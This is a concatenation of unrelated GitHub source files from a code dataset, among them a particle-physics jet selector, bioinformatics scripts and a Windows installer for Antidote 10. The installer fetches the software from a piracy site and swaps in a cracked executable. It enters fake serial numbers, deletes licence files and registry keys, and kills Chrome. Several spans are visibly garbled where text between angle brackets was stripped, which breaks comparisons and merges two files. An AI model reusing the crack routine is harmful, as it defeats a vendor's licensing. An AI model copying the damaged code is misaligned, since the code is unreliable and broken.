test_get_all_transactions(self):\n trans = Transaction(id=40, employee_id=\"E4\", equipment_id=1)\n TS.add_transaction(session=session, transaction=trans)\n trans_list = TS.get_all_transactions(session)\n self.assertEqual(trans, trans_list.all().pop())\n","repo_name":"h181198/scoutgaming","sub_path":"Test/Services/test_transactionService.py","file_name":"test_transactionService.py","file_ext":"py","file_size_in_byte":2658,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"85"} +{"seq_id":"3463664971","text":"import os\nimport sys\nimport math\nimport json\nimport ROOT\nimport random\n\nfrom PhysicsTools.NanoAODTools.postprocessing.framework.datamodel import Collection\nfrom PhysicsTools.NanoAODTools.postprocessing.framework.eventloop import Module\n\nfrom utils import deltaR\n\nclass JetSelection(Module):\n\n def __init__(\n self,\n inputCollection = lambda event: Collection(event, \"Jet\"),\n leptonCollection = lambda event: [],\n outputName = \"centralJets\",\n jetMinPt = 30.,\n jetMaxEta = 2.4,\n dRCleaning = 0.4,\n flagDA = False,\n addSize = True,\n storeKinematics=['pt','eta'],\n globalOptions={\"isData\":False},\n jetId = 0\n ):\n self.globalOptions = globalOptions\n self.inputCollection = inputCollection\n self.leptonCollection = leptonCollection\n self.outputName = outputName\n self.jetMinPt = jetMinPt\n self.jetMaxEta = jetMaxEta\n self.dRCleaning = dRCleaning\n self.flagDA = flagDA\n self.addSize = addSize\n self.storeKinematics = storeKinematics\n self.jetId = jetId\n \n \n def beginJob(self):\n pass\n \n def endJob(self):\n pass\n \n def beginFile(self, inputFile, outputFile, inputTree, wrappedOutputTree):\n self.out = wrappedOutputTree\n if self.addSize:\n self.out.branch(\"n\"+self.outputName,\"I\")\n self.out.branch(\"nfailedId\"+self.outputName,\"I\")\n if self.flagDA:\n self.out.branch(self.outputName+\"_forDA\",\"F\",lenVar=\"nJet\")\n \n for variable in self.storeKinematics:\n self.out.branch(self.outputName+\"_\"+variable,\"F\",lenVar=\"n\"+self.outputName)\n\n \n def endFile(self, inputFile, outputFile, inputTree, wrappedOutputTree):\n pass\n \n def analyze(self, event):\n \"\"\"process event, return True (go to next module) or False (fail, go to next event)\"\"\"\n jets = self.inputCollection(event)\n origJets = Collection(event,\"Jet\")\n selectedJets = []\n unselectedJets = []\n \n if self.flagDA:\n flagsDA = [0.]*event.nJet\n \n failedId = 0\n \n for jet in jets:\n #if self.flagDA:\n # print \"event=%i, index=%i, pt=%.4f, eta=%.4f, \"%(event._entry,jet._index,origJets[jet._index].pt,origJets[jet._index].eta)\n if jet.pt>self.jetMinPt and math.fabs(jet.eta)self.jetId):\n leptons = self.leptonCollection(event)\n if self.dRCleaning>0. and leptons!=None and len(leptons)>0:\n mindr = min(map(lambda lepton: deltaR(lepton,jet),leptons))\n if mindr str:\n return Path().joinpath(os.environ.get(\"PROGRAMFILES(X86)\"), \"Druide\")\n\n @cached_property\n def package_type(self) -> str:\n return \"Office\"\n\n @cached_property\n def curr_version(self) -> str:\n return get_version(self.package_root.joinpath(\"Antidote 10\", \"Application\", \"Bin64\", \"Antidote.exe\"))\n\n @cached_property\n def last_version(self) -> str:\n address = \"https://filecr.com/windows/antidote/\"\n content = requests.get(address).text\n return re.search(\"

Antidote (.*)

\", content).group(1).replace(\" \", \".\").replace(\"v\", \"\")\n\n async def download(self) -> str:\n return await from_filecr(\"https://filecr.com/windows/antidote/\")\n\n async def install(self) -> None:\n if not self.is_installed:\n self._remove_leftovers()\n archive = await self.download()\n destination = extract_dir(archive, password=\"123\")\n setup_dir = Path().joinpath(destination, \"Setup - retail\", \"msi\", \"druide\")\n subprocess.run(f'msiexec.exe /qn /i \"{setup_dir}\\\\Antidote10.msi\" TRANSFORMS=\"{setup_dir}\\\\Antidote10-Interface-en.mst\"')\n subprocess.run(f'msiexec.exe /qn /i \"{setup_dir}\\\\Antidote10-Module-francais.msi\" TRANSFORMS=\"{setup_dir}\\\\Antidote10-Module-francais-Interface-en.mst\"')\n subprocess.run(f'msiexec.exe /qn /i \"{setup_dir}\\\\Antidote10-English-module.msi\" TRANSFORMS=\"{setup_dir}\\\\Antidote10-English-module-Interface-en.mst\"')\n subprocess.run(f'msiexec.exe /qn /i \"{setup_dir}\\\\Antidote-Connectix10.msi\" TRANSFORMS=\"{setup_dir}\\\\Antidote-Connectix10-Interface-en.mst\"')\n updates_dir = os.path.join(destination, \"Updates\")\n for msp_file in glob.glob(os.path.join(updates_dir, \"*.msp\")):\n subprocess.run(f'msiexec.exe /qn /p \"{msp_file}\"')\n shutil.copy(Path().joinpath(destination, \"Crack\", \"Antidote.exe\"), self.package_root.joinpath(\"Antidote 10\", \"Application\", \"Bin64\", \"Antidote.exe\"))\n os.system(\"taskkill /f /im chrome.exe\")\n self._post_install()\n \n def _hide_connectix_icon(self) -> None:\n subprocess.Popen(self.package_root.joinpath(\"Connectix 10\", \"Application\", \"Bin64\", \"Connectix.exe\"))\n win1 = Desktop(backend=\"uia\").window(title=\"Connectix\")\n win1.wait(\"visible\", timeout=20)\n win1.set_focus()\n keyboard.send_keys(\"^R\")\n win2 = Desktop(backend=\"uia\").window(title_re=\"Options.*\")\n win2.wait(\"visible\")\n win2.set_focus()\n keyboard.send_keys(\"{TAB 4}\")\n keyboard.send_keys(\"{SPACE}\")\n keyboard.send_keys(\"{TAB 10}\")\n keyboard.send_keys(\"{SPACE}\")\n win1.close()\n\n def _post_install(self) -> None:\n subprocess.Popen(self.package_root.joinpath(\"Antidote 10\", \"Application\", \"Bin64\", \"Antidote.exe\"))\n # Handle the 1st window.\n win1 = Desktop(backend=\"uia\").window(class_name=\"Qt5QWindowIcon\")\n win1.wait(\"visible\", timeout=20)\n win1.set_focus()\n link = win1[\"Enter a serial number…\"]\n link.click_input()\n # Handle the 2nd window.\n time.sleep(3)\n win2 = Desktop(backend=\"uia\").window(class_name=\"Qt5QWindowIcon\")\n win2.wait(\"visible\")\n win2.set_focus()\n keyboard.send_keys(\"John\")\n keyboard.send_keys(\"{TAB}\")\n keyboard.send_keys(\"Doe\")\n keyboard.send_keys(\"{TAB}\")\n keyboard.send_keys(\"{TAB}\")\n keyboard.send_keys(\"123-456-789-012\")\n keyboard.send_keys(\"{SPACE}\")\n # Handle the 3rd window.\n time.sleep(3)\n win3 = Desktop(backend=\"uia\").window(class_name=\"Qt5QWindowIcon\")\n win3.wait(\"visible\")\n win3.set_focus()\n keyboard.send_keys(\"FV-12345-67890-1234-67890-123455\")\n keyboard.send_keys(\"{TAB}\")\n keyboard.send_keys(\"{TAB}\")\n keyboard.send_keys(\"{SPACE}\")\n # Handle the 4th window.\n time.sleep(3)\n win4 = Desktop(backend=\"uia\").Antidote\n win4.wait(\"visible\")\n win4.set_focus()\n keyboard.send_keys(\"{SPACE}\")\n # Handle the 5th window.\n time.sleep(3)\n win5 = Desktop(backend=\"uia\").window(title_re=\"Personalize.*\")\n win5.wait(\"visible\")\n win5.set_focus()\n keyboard.send_keys(\"{TAB}\")\n keyboard.send_keys(\"{TAB}\")\n keyboard.send_keys(\"{SPACE}\")\n keyboard.send_keys(\"{TAB}\")\n keyboard.send_keys(\"{SPACE}\")\n # Handle the 6th window.\n time.sleep(3)\n win6 = Desktop(backend=\"uia\").window(title_re=\"Personalize.*\")\n win6.wait(\"visible\")\n win6.set_focus()\n keyboard.send_keys(\"{SPACE}\")\n keyboard.send_keys(\"{TAB}\")\n keyboard.send_keys(\"{TAB}\")\n keyboard.send_keys(\"{ENTER}\")\n keyboard.send_keys(\"{TAB}\")\n keyboard.send_keys(\"{SPACE}\")\n keyboard.send_keys(\"{TAB}\")\n keyboard.send_keys(\"{SPACE}\")\n keyboard.send_keys(\"{TAB}\")\n keyboard.send_keys(\"{SPACE}\")\n # Kill all related processes.\n time.sleep(3)\n os.system(\"taskkill /f /im Antidote.exe\")\n os.system(\"taskkill /f /im Connectix.exe\")\n os.system(\"taskkill /f /im AgentAntidote.exe\")\n os.system(\"taskkill /f /im AgentConnectix.exe\")\n time.sleep(3)\n # Hide the connectix icon from taskbar.\n self._hide_connectix_icon()\n\n def _remove_leftovers(self) -> None:\n if os.path.exists(\"C:/Windows/AM213468.bin\"):\n os.remove(\"C:/Windows/AM213468.bin\")\n if os.path.exists(\"C:/Windows/system32/WS022057.bin\"):\n os.remove(\"C:/Windows/system32/WS022057.bin\")\n purge_keys(winreg.HKEY_CURRENT_USER, \"Software\\Druide informatique inc.\")\n purge_keys(winreg.HKEY_LOCAL_MACHINE, \"Software\\Druide informatique inc.\")\n shutil.rmtree(Path().joinpath(os.environ[\"USERPROFILE\"], \"AppData\", \"Roaming\", \"Druide\"), ignore_errors=True)\n shutil.rmtree(self.package_root, ignore_errors=True)\n","repo_name":"lanzorg/winstall","sub_path":"winstall/packages/antidote.py","file_name":"antidote.py","file_ext":"py","file_size_in_byte":6538,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"15701739443","text":"r\"\"\"Manual benchmarks for the Google Earth Engine backend for Xarray.\n\nThese are intended to always be run manually since they are more expensive test\nto run.\n\"\"\"\n\nimport cProfile\nimport os\nimport tempfile\nimport timeit\nfrom typing import List\n\nfrom absl import app\nimport numpy as np\nimport xarray\nimport xee\n\nimport ee\n\n\nREPEAT = 10\nLOOPS = 1\nPROFILE = False\n\n\ndef init_ee_for_tests():\n ee.Initialize(opt_url='https://earthengine-highvolume.googleapis.com')\n\n\ndef open_dataset() -> None:\n _ = xarray.open_dataset(\n 'NASA/GPM_L3/IMERG_V06', engine=xee.EarthEngineBackendEntrypoint\n )\n\n\ndef open_and_chunk() -> None:\n ds = xarray.open_dataset(\n 'NASA/GPM_L3/IMERG_V06',\n crs='EPSG:4326',\n scale=0.25,\n chunks={'index': 24, 'width': 512, 'height': 512},\n engine=xee.EarthEngineBackendEntrypoint,\n )\n ds.chunk()\n\n\ndef open_and_write() -> None:\n with tempfile.TemporaryDirectory() as tmpdir:\n ds = xarray.open_dataset(\n 'NASA/GPM_L3/IMERG_V06',\n crs='EPSG:4326',\n scale=0.25,\n chunks={'time': 24, 'lon': 1440, 'lat': 720},\n engine=xee.EarthEngineBackendEntrypoint,\n )\n ds = ds.isel(time=slice(0, 24))\n ds.to_zarr(os.path.join(tmpdir, 'imerg.zarr'))\n\n\ndef main(_: List[str]) -> None:\n print('Initializing EE...')\n init_ee_for_tests()\n print(f'[{REPEAT} time(s) with {LOOPS} loop(s) each.]')\n for fn in ['open_dataset()', 'open_and_chunk()', 'open_and_write()']:\n if PROFILE:\n cProfile.run(fn)\n timer = timeit.Timer(fn, globals=globals())\n res = timer.repeat(REPEAT, number=LOOPS)\n avg, std, best, worst = np.mean(res), np.std(res), np.min(res), np.max(res)\n print(f'{fn}:avg={avg:.2f},std={std:.2f},best={best:.2f},worst={worst:.2f}')\n\n\nif __name__ == '__main__':\n app.run(main)\n","repo_name":"google/Xee","sub_path":"xee/micro_benchmarks.py","file_name":"micro_benchmarks.py","file_ext":"py","file_size_in_byte":1784,"program_lang":"python","lang":"en","doc_type":"code","stars":162,"dataset":"github-code","pt":"85"} +{"seq_id":"14344655866","text":"# program to calculate the total frequency of trinucleotide SSR motifs present in the coding region (CDS) of a particular gene\n\n#usage : python3 SSR_CDS_overlap.py Phyag_NZFS3770.tri_gene.txt Phyag_NZFS3770.ffn for organism Phytophthora agathicida isolate NZFS3770.\n# *.tri_gene.txt contains 2 columns: SSR motif and gene ids. This information was obtained from doing a bed intersection between SSR file and gff3 fiile.\n# *.ffn contains gene ids and coding (CDS) regions. the original file was modified by a bash script so that gene ids of .ffn files and .tri_gene_txt files have\n# the same format and can be matched \nimport pandas as pd\nimport sys\ndataframe1 = pd.read_csv(sys.argv[1], sep=\"\\t\", header=None)\nduplicate = dataframe1.drop_duplicates()\nduplicate.columns =['ID', 'motif']\n# with pd.option_context('display.max_rows', None, 'display.max_columns', None): # more options can be specified also\n# print(duplicate)\ndictionary_tri = {k: list(v) for k,v in duplicate.groupby(\"ID\")[\"motif\"]} \n#print (dictionary_tri)\nfrom Bio import SeqIO\ndictionary_ffn={}\ndictionary={}\nwith open(sys.argv[2]) as handle:\n for record in SeqIO.parse(handle, \"fasta\"):\n dictionary_ffn[record.id] = str(record.seq)\n# print(dictionary_ffn)\nfor search_key in dictionary_tri:\n res = [val for key, val in dictionary_ffn.items() if search_key==key]\n CDS_residue=''.join(res)\n record_seq_length = len(CDS_residue)\n for tri in dictionary_tri[search_key]:\n #print(tri)\n for k in range(0, record_seq_length, 3):\n tri1=CDS_residue[k:k+3]\n #print (tri,tri1)\n if tri1 in dictionary and tri==tri1: dictionary[tri1]+=1\n elif tri1 == tri: dictionary[tri1] =1\n\nimport operator\nsorted_d = dict( sorted(dictionary.items(), key=operator.itemgetter(0)))\ndf = pd.DataFrame.from_dict(sorted_d, orient ='index')\nprint(df)\n\n","repo_name":"computational-genomics-lab/scripts-for-SSR-project","sub_path":"Python-Scripts/SSR_CDS_overlap.py","file_name":"SSR_CDS_overlap.py","file_ext":"py","file_size_in_byte":1855,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"85"} +{"seq_id":"7146622055","text":"import json\nimport math\nimport pandas as pd\n\ndataset = pd.read_csv(\"dataset/dataset_TF\", sep=\"\\t\")\nidf = json.loads(open(\"dataset/dataset_IDF\").readlines()[0])\n\n#dataset.to_csv(\"dataset/teste\", sep=\"\\t\")\nidf_zero = []\nidf_list = []\n\nfor word in idf:\n if idf[word] == 0:\n idf_zero.append(word)\n else:\n idf_list.append(word)\nprint(len(idf_zero))\n\ndataset = dataset.drop(columns = idf_zero)\ndataset.to_csv(\"dataset/datset_drop_TF\", sep='\\t', index=False)\n\nidf_dataset = pd.DataFrame.from_dict(idf)\n\n'''l = len(dataset)\n\nfor i in range(l):\n print(i)\n aux = 0\n for word in idf_list:\n aux += 1\n print(aux)\n dataset.at[i, word] = dataset.iloc[i][word] * idf[word]\n\ndataset.to_csv(\"dataset/dataset_TFxIDF\", sep='\\t')'''","repo_name":"gabrielvmelo/Projeto-RI","sub_path":"classifier.py","file_name":"classifier.py","file_ext":"py","file_size_in_byte":761,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"39939640027","text":"import psycopg2\nfrom psycopg2 import Error\nimport pandas as pd\nimport pandas.io.sql as psql\ntry:\n \n # DATABASE CONNECTION VARIABLES USED TO BE HERE BUT HAVE BEEN REMOVED\n\n cursor = connection.cursor()\n \n\n ## create table\n create_table_query = '''\n CREATE TABLE countrymeasures (ID SERIAL PRIMARY KEY NOT NULL, COUNTRY VARCHAR(80) NOT NULL, MEASURE VARCHAR(80) NOT NULL, DATE_START DATE, DATE_END DATE);\n '''\n cursor.execute(create_table_query)\n connection.commit()\n print(\"Table created successfully in PostgreSQL \")\n\n\n\n ## load dataset into table\n load_data_query = '''\n COPY countrymeasures(country, measure, date_start, date_end) FROM 'response_graph.csv' DELIMITER ',' NULL 'NA' CSV HEADER;\n '''\n cursor.execute(load_data_query)\n connection.commit()\n print(\"Dataset loaded successfully\")\n\n\n\n ## query data from database\n select_data_query = '''\n SELECT * FROM countrymeasures WHERE country = 'Denmark';\n '''\n cursor.execute(select_data_query)\n data = cursor.fetchall()\n for row in data:\n print(row)\n print(\"Data selected successfully in Database\")\n\n\n\nexcept (Exception, psycopg2.DatabaseError) as error :\n print (\"Error while creating PostgreSQL table\", error)\nfinally:\n #closing database connection.\n if(connection):\n cursor.close()\n connection.close()\n print(\"PostgreSQL connection is closed\")\n \n","repo_name":"MikkelTJensen/P5clone","sub_path":"first_iteration/dbpythontest/dbconnectiontest.py","file_name":"dbconnectiontest.py","file_ext":"py","file_size_in_byte":1431,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"34805506025","text":"\"\"\"\nfunctions to access the data dictionary in a clearer way\n\"\"\"\n\nimport os\nimport toolz as tz\nfrom bcbio.utils import file_exists\nfrom bcbio.log import logger\nimport sys\n\nLOOKUPS = {\n \"config\": {\"keys\": ['config']},\n \"tmp_dir\": {\"keys\": ['config', 'resources', 'tmp', 'dir']},\n \"num_cores\": {\"keys\": ['config', 'algorithm', 'num_cores'],\n \"default\": 1},\n \"svprioritize\": {\"keys\": ['config', 'algorithm', 'svprioritize']},\n \"effects_transcripts\": {\"keys\": [\"config\", \"algorithm\", \"effects_transcripts\"], \"default\": \"all\"},\n \"genome_build\": {\"keys\": [\"genome_build\"]},\n \"gtf_file\": {\"keys\": ['genome_resources', 'rnaseq', 'transcripts'],\n \"checker\": file_exists},\n \"transcriptome_fasta\": {\"keys\": [\"config\", \"algorithm\", \"transcriptome_fasta\"],\n \"default\": None},\n \"singlecell_quantifier\": {\"keys\": [\"config\", \"algorithm\",\n \"singlecell_quantifier\"],\n \"default\": \"rapmap\"},\n \"positional_umi\": {\"keys\": [\"config\", \"algorithm\", \"positional_umi\"]},\n \"tx2gene\": {\"keys\": [\"tx2gene\"]},\n \"ref_file\": {\"keys\": [\"reference\", \"fasta\", \"base\"]},\n \"ref_file_compressed\": {\"keys\": [\"reference\", \"fastagz\", \"base\"]},\n \"ref_twobit\": {\"keys\": [\"reference\", \"twobit\"]},\n \"srna_gtf_file\": {\"keys\": ['genome_resources', 'srnaseq', 'srna_transcripts'],\n \"checker\": file_exists},\n \"srna_trna_file\": {\"keys\": ['genome_resources', 'srnaseq', 'trna_fasta'],\n \"checker\": file_exists},\n \"srna_mint_lookup\": {\"keys\": ['genome_resources', 'srnaseq', 'mint_lookup'],\n \"checker\": file_exists},\n \"srna_mint_space\": {\"keys\": ['genome_resources', 'srnaseq', 'mint_space'],\n \"checker\": file_exists},\n \"srna_mint_other\": {\"keys\": ['genome_resources', 'srnaseq', 'mint_other'],\n \"checker\": file_exists},\n \"mirdeep2_file\": {\"keys\": ['genome_resources', 'srnaseq', 'mirdeep2_fasta'],\n \"checker\": file_exists},\n \"mirbase_hairpin\": {\"keys\": ['genome_resources', 'srnaseq', 'mirbase_hairpin'],\n \"checker\": file_exists},\n \"mirbase_mature\": {\"keys\": ['genome_resources', 'srnaseq', 'mirbase_mature'],\n \"checker\": file_exists},\n \"gene_bed\": {\"keys\": ['genome_resources', 'rnaseq', 'gene_bed'],\n \"checker\": file_exists},\n \"work_dir\": {\"keys\": ['dirs', 'work']},\n \"sam_ref\": {\"keys\": [\"sam_ref\"]},\n \"disambiguate\": {\"keys\": [\"config\", \"algorithm\", \"disambiguate\"],\n \"default\": False},\n \"lane\": {\"keys\": [\"rgnames\", \"lane\"]},\n \"cores\": {\"keys\": [\"config\", \"algorithm\", \"num_cores\"], \"default\": 1},\n \"sample_name\": {\"keys\": ['rgnames', 'sample']},\n \"strandedness\": {\"keys\": ['config', 'algorithm', 'strandedness'],\n \"default\": \"unstranded\"},\n \"vcfanno\": {\"keys\": ['config', 'algorithm', 'vcfanno'], \"default\": []},\n \"analysis\": {\"keys\": [\"analysis\"]},\n \"square_vcf\": {\"keys\": ['square_vcf']},\n \"ploidy\": {\"keys\": ['config', 'algorithm', 'ploidy'], \"default\": 2},\n \"gender\": {\"keys\": [\"metadata\", \"sex\"], \"default\": \"\"},\n \"batch\": {\"keys\": [\"metadata\", \"batch\"]},\n \"mark_duplicates\": {\"keys\": [\"config\", \"algorithm\", \"mark_duplicates\"], \"default\": True},\n \"phenotype\": {\"keys\": [\"metadata\", \"phenotype\"], \"default\": \"\"},\n \"svclass\": {\"keys\": [\"metadata\", \"svclass\"], \"default\": \"\"},\n \"hetcaller\": {\"keys\": [\"config\", \"algorithm\", \"hetcaller\"]},\n \"variantcaller\": {\"keys\": ['config', 'algorithm', 'variantcaller']},\n \"svcaller\": {\"keys\": ['config', 'algorithm', 'svcaller'], \"default\": [], \"always_list\": True},\n \"jointcaller\": {\"keys\": ['config', 'algorithm', 'jointcaller']},\n \"hlacaller\": {\"keys\": ['config', 'algorithm', 'hlacaller']},\n \"recalibrate\": {\"keys\": ['config', 'algorithm', 'recalibrate'], \"default\": False},\n \"realign\": {\"keys\": ['config', 'algorithm', 'realign'], \"default\": False},\n \"peakcaller\": {\"keys\": ['config', 'algorithm', 'peakcaller'], \"default\": []},\n \"chip_method\": {\"keys\": ['config', 'algorithm', 'chip_method'], \"default\": \"chip\"},\n \"spikein_counts\": {\"keys\": [\"spikein_counts\"]},\n \"count_file\": {\"keys\": [\"count_file\"]},\n \"mirna_counts\": {\"keys\": [\"mirna_counts\"]},\n \"isomir_counts\": {\"keys\": [\"isomir_counts\"]},\n \"novel_mirna_counts\": {\"keys\": [\"novel_mirna_counts\"]},\n \"novel_isomir_counts\": {\"keys\": [\"novel_isomir_counts\"]},\n \"combined_counts\": {\"keys\": [\"combined_counts\"]},\n \"annotated_combined_counts\": {\"keys\": [\"annotated_combined_counts\"]},\n \"genome_context_files\": {\"keys\": [\"reference\", \"genome_context\"], \"default\": [], \"always_list\": True},\n \"viral_files\": {\"keys\": [\"reference\", \"viral\"], \"default\": [], \"always_list\": True},\n \"archive\": {\"keys\": [\"config\", \"algorithm\", \"archive\"], \"default\": [], \"always_list\": True},\n \"dexseq_gff\": {\"keys\": ['genome_resources', 'rnaseq', 'dexseq']},\n \"combined_fpkm\": {\"keys\": ['combined_fpkm']},\n \"combined_fpkm_isoform\": {\"keys\": ['combined_fpkm_isoform']},\n \"express_fpkm\": {\"keys\": ['express_fpkm']},\n \"express_tpm\": {\"keys\": ['express_tpm']},\n \"express_counts\": {\"keys\": ['express_counts']},\n \"isoform_to_gene\": {\"keys\": ['isoform_to_gene']},\n \"fusion_mode\": {\"keys\": ['config', 'algorithm', 'fusion_mode']},\n \"dexseq_counts\": {\"keys\": ['dexseq_counts']},\n \"description\": {\"keys\": ['description']},\n \"aligner\": {\"keys\": ['config', 'algorithm', 'aligner']},\n \"bam_clean\": {\"keys\": ['config', 'algorithm', 'bam_clean']},\n \"platform\": {\"keys\": ['config', 'algorithm', 'platform'],\n \"default\": \"illumina\"},\n \"quality_format\": {\"keys\": ['config', 'algorithm', 'quality_format'],\n \"default\": \"standard\"},\n \"algorithm_qc\": {\"keys\": ['config', 'algorithm', 'qc'], \"default\": [], \"always_list\": True},\n \"summary_qc\": {\"keys\": ['summary', 'qc'], \"default\": {}},\n \"summary_metrics\": {\"keys\": ['summary', 'metrics'], \"default\": {}},\n \"adapters\": {\"keys\": ['config', 'algorithm', 'adapters'],\n \"default\": []},\n \"custom_trim\": {\"keys\": ['config', 'algorithm', 'custom_trim'],\n \"default\": []},\n \"species\": {\"keys\": ['config', 'algorithm', 'species'],\n \"default\": None},\n \"trim_reads\": {\"keys\": ['config', 'algorithm', 'trim_reads'],\n \"default\": None},\n \"trim_ends\": {\"keys\": ['config', 'algorithm', 'trim_ends'],\n \"default\": []},\n \"min_read_length\": {\"keys\": ['config', 'algorithm', 'min_read_length'],\n \"default\": 25},\n \"variation_resources\": {\"keys\": [\"genome_resources\", \"variation\"], \"default\": {}},\n \"qsig_file\": {\"keys\": ['genome_resources', 'variation', 'qsignature'],\n \"checker\": file_exists},\n \"mixup_check\": {\"keys\": [\"config\", \"algorithm\", \"mixup_check\"],\n \"default\": False},\n \"cufflinks_dir\": {\"keys\": ['cufflinks_dir']},\n \"stringtie_dir\": {\"keys\": ['stringtie_dir']},\n \"rsem\": {\"keys\": [\"config\", \"algorithm\", \"rsem\"], \"default\": False},\n \"transcriptome_align\": {\"keys\": [\"config\", \"algorithm\", \"transcriptome_align\"],\n \"default\": False},\n \"expression_caller\": {\"keys\": [\"config\", \"algorithm\", \"expression_caller\"],\n \"default\": []},\n \"spikein_fasta\" : {\"keys\": [\"config\", \"algorithm\", \"spikein_fasta\"], \"default\": None},\n \"transcriptome_bam\": {\"keys\": [\"transcriptome_bam\"]},\n \"fpkm_isoform\": {\"keys\": [\"fpkm_isoform\"]},\n \"fpkm\": {\"keys\": [\"fpkm\"]},\n \"galaxy_dir\": {\"keys\": [\"dirs\", \"galaxy\"]},\n \"assembled_gtf\": {\"keys\": [\"assembled_gtf\"], \"default\": []},\n \"merged_gtf\": {\"keys\": [\"merged_gtf\"], \"default\": None},\n \"transcript_assembler\": {\"keys\": [\"config\", \"algorithm\", \"transcript_assembler\"],\n \"default\": []},\n \"oncofuse_file\": {\"keys\": [\"oncofuse_file\"]},\n \"pizzly_dir\": {\"keys\": [\"pizzly_dir\"]},\n \"split_bam\": {\"keys\": [\"split_bam\"]},\n \"vrn_file\": {\"keys\": [\"vrn_file\"]},\n \"variant_regions\": {\"keys\": [\"config\", \"algorithm\", \"variant_regions\"]},\n \"variant_regions_merged\": {\"keys\": [\"config\", \"algorithm\", \"variant_regions_merged\"]},\n \"variant_regions_orig\": {\"keys\": [\"config\", \"algorithm\", \"variant_regions_orig\"]},\n \"coverage\": {\"keys\": [\"config\", \"algorithm\", \"coverage\"]},\n \"coverage_merged\": {\"keys\": [\"config\", \"algorithm\", \"coverage_merged\"]},\n \"coverage_orig\": {\"keys\": [\"config\", \"algorithm\", \"coverage_orig\"]},\n \"callable_regions\": {\"keys\": [\"regions\", \"callable\"]},\n \"avg_coverage\": {\"keys\": [\"regions\", \"avg_coverage\"]},\n \"coverage_depth_bed\": {\"keys\": [\"regions\", \"coverage_depth_bed\"]},\n \"callable_min_size\": {\"keys\": [\"config\", \"algorithm\", \"callable_min_size\"],\n \"default\": 1000000},\n \"min_allele_fraction\": {\"keys\": [\"config\", \"algorithm\", \"min_allele_fraction\"]},\n \"save_diskspace\": {\"keys\": [\"config\", \"algorithm\", \"save_diskspace\"]},\n \"salmon\": {\"keys\": [\"salmon\"]},\n \"umi_type\": {\"keys\": [\"config\", \"algorithm\", \"umi_type\"]},\n \"sample_barcodes\": {\"keys\": [\"config\", \"algorithm\", \"sample_barcodes\"]},\n \"cellular_barcodes\": {\"keys\": [\"config\", \"algorithm\", \"cellular_barcodes\"],\n \"default\": []},\n \"minimum_barcode_depth\": {\"keys\": [\"config\", \"algorithm\", \"minimum_barcode_depth\"],\n \"default\": 100000},\n \"cellular_barcode_correction\": {\"keys\": [\"config\", \"algorithm\",\n \"cellular_barcode_correction\"],\n \"default\": 1},\n \"kallisto_quant\": {\"keys\": [\"kallisto_quant\"]},\n \"salmon_dir\": {\"keys\": [\"salmon_dir\"]},\n \"sailfish\": {\"keys\": [\"sailfish\"]},\n \"sailfish_dir\": {\"keys\": [\"sailfish_dir\"]},\n \"sailfish_transcript_tpm\": {\"keys\": [\"sailfish_transcript_tpm\"]},\n \"sailfish_gene_tpm\": {\"keys\": [\"sailfish_gene_tpm\"]},\n \"sample_callable\": {\"keys\": [\"regions\", \"sample_callable\"]},\n \"coverage_interval\": {\"keys\": [\"config\", \"algorithm\", \"coverage_interval\"]},\n \"coverage_depth_min\": {\"keys\": [\"config\", \"algorithm\", \"coverage_depth_min\"],\n \"default\": 4},\n \"maxcov_downsample\": {\"keys\": [\"config\", \"algorithm\", \"maxcov_downsample\"],\n \"default\": False},\n \"joint_group_size\": {\"keys\": [\"config\", \"algorithm\", \"joint_group_size\"],\n \"default\": 200},\n \"report\": {\"keys\": [\"config\", \"algorithm\", \"report\"]},\n \"work_bam\": {\"keys\": [\"work_bam\"]},\n \"deduped_bam\": {\"keys\": [\"deduped_bam\"]},\n \"align_bam\": {\"keys\": [\"align_bam\"]},\n \"disc_bam\": {\"keys\": [\"work_bam_plus\", \"disc\"]},\n \"sr_bam\": {\"keys\": [\"work_bam_plus\", \"sr\"]},\n \"tools_off\": {\"keys\": [\"config\", \"algorithm\", \"tools_off\"], \"default\": [], \"always_list\": True},\n \"tools_on\": {\"keys\": [\"config\", \"algorithm\", \"tools_on\"], \"default\": [], \"always_list\": True},\n \"cwl_reporting\": {\"keys\": [\"config\", \"algorithm\", \"cwl_reporting\"]},\n}\n\ndef get_batches(data):\n batches = get_batch(data)\n if batches:\n if not isinstance(batches, (list, tuple)):\n batches = [batches]\n return batches\n\ndef get_input_sequence_files(data, default=None):\n \"\"\"\n returns the input sequencing files, these can be single or paired FASTQ\n files or BAM files\n \"\"\"\n if \"files\" not in data:\n file1, file2 = None, None\n elif len(data[\"files\"]) == 2:\n file1, file2 = data[\"files\"]\n else:\n assert len(data[\"files\"]) == 1, data[\"files\"]\n file1, file2 = data[\"files\"][0], None\n return file1, file2\n\ndef get_umi_consensus(data):\n \"\"\"Retrieve UMI for consensus based preparation.\n\n We specify this either as a separate fastq file or embedded\n in the read name as `fastq_name`.`\n \"\"\"\n consensus_choices = ([\"fastq_name\"])\n umi = tz.get_in([\"config\", \"algorithm\", \"umi_type\"], data)\n if umi and (umi in consensus_choices or os.path.exists(umi)):\n assert tz.get_in([\"config\", \"algorithm\", \"mark_duplicates\"], data, True), \\\n \"Using consensus UMI inputs requires marking duplicates\"\n return umi\n\ndef get_dexseq_gff(config, default=None):\n \"\"\"\n some older versions of the genomes have the DEXseq gff file as\n gff instead of gff3, so this handles that by looking for either one\n \"\"\"\n dexseq_gff = tz.get_in(tz.get_in(['dexseq_gff', 'keys'], LOOKUPS, {}),\n config, None)\n if not dexseq_gff:\n return None\n gtf_file = get_gtf_file(config)\n if gtf_file:\n base_dir = os.path.dirname(gtf_file)\n else:\n base_dir = os.path.dirname(dexseq_gff)\n base, _ = os.path.splitext(dexseq_gff)\n gff_file = os.path.join(base_dir, base + \".gff\")\n if file_exists(gff_file):\n return gff_file\n gtf_file = os.path.join(base_dir, base + \".gff3\")\n if file_exists(gtf_file):\n return gtf_file\n else:\n return None\n\ndef getter(keys, global_default=None, always_list=False):\n def lookup(config, default=None):\n default = global_default if not default else default\n val = tz.get_in(keys, config, default)\n if always_list:\n if not val:\n val = []\n elif not isinstance(val, (list, tuple)): val = [val]\n return val\n return lookup\n\ndef setter(keys, checker):\n def update(config, value):\n if checker and not checker(value):\n 